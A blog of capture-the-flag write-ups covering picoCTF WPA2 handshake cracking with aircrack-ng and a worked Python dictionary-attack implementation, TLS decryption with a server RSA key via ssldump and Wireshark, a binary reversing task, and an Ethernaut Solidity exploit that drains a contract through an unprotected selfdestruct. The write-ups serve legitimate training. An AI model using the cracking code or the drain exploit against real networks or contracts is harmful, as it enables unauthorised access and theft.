29 Sep 2022
PicoGym Exclusive / Forensics
Description
I thought that my password was super-secret, but it turns out that passwords passed over the AIR can be CRACKED, especially if I used the same wireless network password as one in the rockyou.txt credential dump.
Use this ‘pcap file’ and the rockyou wordlist. The flag should be entered in the picoCTF{XXXXXX} format.
Prerequisite
Aircrack-ng, a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.
Writeup
- Download the pcap file and the rockyou wordlist.
- Crack the WPA handshake in the capture against the wordlist. aircrack-ng needs the 4-way handshake (and the SSID from the beacon) to be present in the pcap; for every candidate passphrase it derives the PMK and checks it against the handshake MIC, so the password is recovered only if it appears in the wordlist:
aircrack-ng -w rockyou.txt wpa-ing_out.pcap
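The check aircrack-ng runs for every word in rockyou.txt, written out as an added example (it is not code from the challenge or from aircrack-ng). The handshake is constructed in the block: message 2 of the 4-way handshake is built and its MIC computed with a known passphrase, and the SSID, MACs, nonces and the six-word wordlist are all made up, so the attack runs offline without the pcap.

```python
"""Offline WPA2-PSK dictionary attack, the check aircrack-ng runs on a captured 4-way handshake.

Added example for this writeup; it is not code from the challenge or from aircrack-ng.
The handshake below is CONSTRUCTED: message 2 is built here and its MIC is computed with a
known passphrase, so the attack runs offline without a pcap.
"""
import hashlib
import hmac

MIC_OFFSET = 81  # EAPOL hdr 4 + desc type 1 + key info 2 + key len 2 + replay 8 + nonce 32 + IV 16 + RSC 8 + ID 8


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes); the expensive step per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max(MAC) || min/max(nonce))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes covers the 64-byte PTK
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1 over the EAPOL-Key frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_wpa2(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, wordlist):
    """Return the first passphrase whose KCK (PTK[0:16]) reproduces the captured MIC, else None."""
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = wpa2_ptk(wpa2_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


# ---- constructed handshake (stand-in for the pcap) ----
SSID = "picoCTF-demo"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["123456", "password", "iloveyou", "princess", "sunshine2", "qwerty123"]  # tiny rockyou-like slice


def constructed_msg2(passphrase: str) -> bytes:
    """Build handshake message 2 (STA -> AP, carries SNonce + MIC) as the station would have sent it."""
    frame = bytearray()
    frame += b"\x02\x03\x00\x5f"       # EAPOL v2, type Key, body length 95
    frame += b"\x02"                   # descriptor type: RSN
    frame += b"\x01\x0a"               # key info: HMAC-SHA1-AES, pairwise, MIC present
    frame += b"\x00\x10"               # key length 16
    frame += (1).to_bytes(8, "big")    # replay counter
    frame += SNONCE
    frame += bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID
    frame += bytes(16)                 # MIC placeholder, filled below
    frame += b"\x00\x00"               # key data length 0
    kck = wpa2_ptk(wpa2_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return bytes(frame)


def demo() -> str:
    return crack_wpa2(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, constructed_msg2("sunshine2"), WORDLIST)


if __name__ == "__main__":
    print(demo())  # sunshine2
```

The PBKDF2 step is what makes the attack cost 4096 SHA-1 rounds per candidate, and because the SSID is the salt, a precomputed table only helps for a known SSID; everything else (PTK, MIC) is cheap, which is why a weak passphrase in rockyou.txt falls quickly.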

28 Sep 2022
PicoCTF 2019 / Forensics
Description
We found this packet capture and key. Recover the flag.
Prerequisite
ssldump, an SSL/TLS network protocol analyzer.
Writeup
- Download the packet capture and the key.
- Decrypt the capture with the server's private key and dump the application data (-d). This works only because the session used RSA key exchange, where the private key decrypts the premaster secret sent in the ClientKeyExchange; with an (EC)DHE suite the key file alone would not recover the session.
ssldump -r capture.pcap -k picopico.key -d > output
vim output
- Search the decrypted output for the flag.

28 Sep 2022
PicoCTF 2019 / Forensics
Description
We found this packet capture and key. Recover the flag.
Writeup
- Download the packet capture and the key.
- Open the packet capture in Wireshark.
- Edit > Preferences > Protocols > TLS > RSA keys list > Edit..., then add the downloaded key (picopico.key).
- Wireshark now decrypts the session. Follow the decrypted TLS stream (Analyze > Follow > TLS Stream) and look for the flag.

Reference
Decrypting TLS Streams With Wireshark: Part 1
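What both tools above do with the key file, as an added example that is not code from the challenge, ssldump or Wireshark. With the server's RSA private key the tool decrypts the ClientKeyExchange to get the 48-byte premaster secret and then runs the TLS 1.2 PRF; the block also shows the check a practitioner wants first, whether the negotiated suite used RSA key exchange at all. The ServerHello record, both randoms and the premaster secret are constructed (the RSA decryption itself is not performed), and the suite tables list only a handful of well-known suite IDs.

```python
"""What `ssldump -k` and Wireshark's RSA keys list do with picopico.key, as an added example.

Not code from the challenge, ssldump or Wireshark. The ServerHello record, randoms and
premaster secret below are CONSTRUCTED so the derivation runs offline. If the session
negotiated an (EC)DHE suite the RSA key only signed the handshake and no key file can
recover the traffic keys.
"""
import hashlib
import hmac
import struct

# RSA key exchange: the client encrypts the premaster secret to the server's RSA key.
RSA_KX_SUITES = {
    0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
    0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA",
    0x003C: "TLS_RSA_WITH_AES_128_CBC_SHA256",
    0x009C: "TLS_RSA_WITH_AES_128_GCM_SHA256",
}
# Ephemeral DH: the RSA key only signs the ServerKeyExchange; a leaked key does not recover past sessions.
ECDHE_SUITES = {
    0xC013: "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA",
    0xC02F: "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    0xC030: "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
}


def parse_server_hello(record: bytes):
    """Extract server_random and the negotiated cipher suite from a TLS 1.2 ServerHello record."""
    content_type, _version, length = struct.unpack(">BHH", record[:5])
    if content_type != 0x16:
        raise ValueError("not a handshake record")
    hs = record[5:5 + length]
    if hs[0] != 0x02:
        raise ValueError("not a ServerHello")
    body = hs[4:]                # handshake type (1) + length (3) skipped
    server_random = body[2:34]   # legacy version (2), then 32 bytes of random
    sid_len = body[34]
    pos = 35 + sid_len
    (cipher_suite,) = struct.unpack(">H", body[pos:pos + 2])
    return server_random, cipher_suite


def key_file_can_decrypt(cipher_suite: int) -> bool:
    """True only for static-RSA key exchange; (EC)DHE suites have forward secrecy."""
    return cipher_suite in RSA_KX_SUITES


def p_sha256(secret: bytes, seed: bytes, length: int) -> bytes:
    """P_hash from RFC 5246 section 5 instantiated with HMAC-SHA256."""
    out, a = b"", seed
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()
    return out[:length]


def tls12_prf(secret: bytes, label: bytes, seed: bytes, length: int) -> bytes:
    return p_sha256(secret, label + seed, length)


def master_secret(premaster: bytes, client_random: bytes, server_random: bytes) -> bytes:
    return tls12_prf(premaster, b"master secret", client_random + server_random, 48)


def session_keys_aes128_cbc_sha(master: bytes, client_random: bytes, server_random: bytes) -> dict:
    """Key expansion for TLS_RSA_WITH_AES_128_CBC_SHA; note the seed order is server_random + client_random."""
    layout = [("client_mac", 20), ("server_mac", 20), ("client_key", 16),
              ("server_key", 16), ("client_iv", 16), ("server_iv", 16)]
    block = tls12_prf(master, b"key expansion", server_random + client_random, sum(n for _, n in layout))
    keys, pos = {}, 0
    for name, size in layout:
        keys[name] = block[pos:pos + size]
        pos += size
    return keys


# ---- constructed session material (stand-in for capture.pcap + picopico.key) ----
CLIENT_RANDOM = bytes(range(32))
SERVER_RANDOM = bytes(range(32, 64))
_body = b"\x03\x03" + SERVER_RANDOM + b"\x00" + b"\x00\x2f" + b"\x00"  # TLS 1.2, random, empty session id, suite 0x002F, null compression
_hs = b"\x02" + len(_body).to_bytes(3, "big") + _body
SERVER_HELLO = b"\x16\x03\x03" + len(_hs).to_bytes(2, "big") + _hs
PREMASTER = b"\x03\x03" + bytes(46)  # what RSA-decrypting the ClientKeyExchange yields: version + 46 random bytes (zeros here)


def recover_session_keys(server_hello: bytes = SERVER_HELLO, premaster: bytes = PREMASTER) -> dict:
    """End-to-end: parse ServerHello, confirm the suite is decryptable, derive master secret and traffic keys."""
    server_random, suite = parse_server_hello(server_hello)
    if not key_file_can_decrypt(suite):
        raise ValueError("suite %#06x uses ephemeral DH; the RSA key file cannot decrypt it" % suite)
    master = master_secret(premaster, CLIENT_RANDOM, server_random)
    return session_keys_aes128_cbc_sha(master, CLIENT_RANDOM, server_random)


if __name__ == "__main__":
    for name, key in recover_session_keys().items():
        print(name, key.hex())
```

If Wireshark shows a suite from the ECDHE table for the capture, adding the key to the RSA keys list does nothing; you would need the session's (pre-)master secrets in a key log file instead.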
28 Sep 2022
PicoCTF 2022 / Reverse Engineering / binary / obfuscation
Writeup
- Download the file.
- Use the file command to check its type:
file bbbbloat
#bbbbloat: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=99c5c1ce06be240322c15bcabc3cd90318eb2003, for GNU/Linux 3.2.0, stripped
- Use IDA to decompile it (View > Open subviews > Generate pseudocode). The binary is stripped, so there are no function names; locate main through the function pointer passed to __libc_start_main in start. The pseudocode reveals the number the program expects (549255).

- Run the binary and enter 549255 when prompted to get the flag.

27 Sep 2022
Difficulty: 🌕🌕🌕🌑🌑
A contract creator has built a very simple token factory contract. Anyone can create new tokens with ease. After deploying the first token contract, the creator sent 0.001 ether to obtain more tokens. They have since lost the contract address.
This level will be completed if you can recover (or remove) the 0.001 ether from the lost contract address.
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract Recovery {

  //generate tokens
  function generateToken(string memory _name, uint256 _initialSupply) public {
    new SimpleToken(_name, msg.sender, _initialSupply);
  }
}

contract SimpleToken {

  using SafeMath for uint256;
  // public variables
  string public name;
  mapping (address => uint) public balances;

  // constructor
  constructor(string memory _name, address _creator, uint256 _initialSupply) public {
    name = _name;
    balances[_creator] = _initialSupply;
  }

  // collect ether in return for tokens
  receive() external payable {
    balances[msg.sender] = msg.value.mul(10);
  }

  // allow transfers of tokens
  function transfer(address _to, uint _amount) public {
    require(balances[msg.sender] >= _amount);
    balances[msg.sender] = balances[msg.sender].sub(_amount);
    balances[_to] = _amount;
  }

  // clean up after ourselves
  function destroy(address payable _to) public {
    selfdestruct(_to);
  }
}
Writeup
- Get a new instance.
- Get the level instance's address from the Ethernaut console:
instance
// '0x952282e64E0DE0618E337114AA315cE3eBb1351A'
- Search this address on Etherscan. Under its internal transactions there is a Contract Creation record; click into it to get the address of the SimpleToken contract the instance deployed. (The address is also deterministic: a CREATE'd contract lives at keccak256(rlp([creator, nonce]))[12:], and the instance's first deployment used nonce 1, so it can be computed without the block explorer.)


- Create a new contract to exploit it. SimpleToken.destroy() is public with no access control, so anyone can call it, and selfdestruct sends the contract's whole balance to the address supplied:
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0 <0.9.0;

interface ISimpleToken {
  function destroy(address payable _to) external;
}

contract RecoveryExploit {
  function withdraw() public {
    ISimpleToken(YOUR_SIMPLETOKEN_ADDRESS).destroy(payable(msg.sender));
  }
}
- Compile and deploy.
- Call the withdraw method of RecoveryExploit. The SimpleToken contract self-destructs and all remaining ether is sent to msg.sender, the account that called withdraw. (Since the Cancun upgrade, EIP-6780 makes selfdestruct keep the contract's code and storage unless it was created in the same transaction, but the ether transfer still happens, so the level is still solved this way.)
- Submit instance ξ( ✿>◡❛)